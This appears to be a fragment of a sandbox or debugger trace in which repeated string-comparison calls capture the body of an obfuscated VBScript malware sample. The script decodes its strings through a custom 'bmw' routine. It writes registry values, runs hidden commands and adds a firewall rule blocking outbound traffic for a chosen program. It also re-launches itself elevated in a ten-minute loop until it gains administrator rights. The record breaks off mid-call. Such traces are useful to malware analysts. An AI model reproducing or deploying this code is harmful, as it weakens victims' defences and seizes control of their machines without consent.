bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.353] wcsncmp (_String1="t\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.354] wcsncmp (_String1="\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.354] wcsncmp (_String1="\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.354] wcsncmp (_String1="\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", 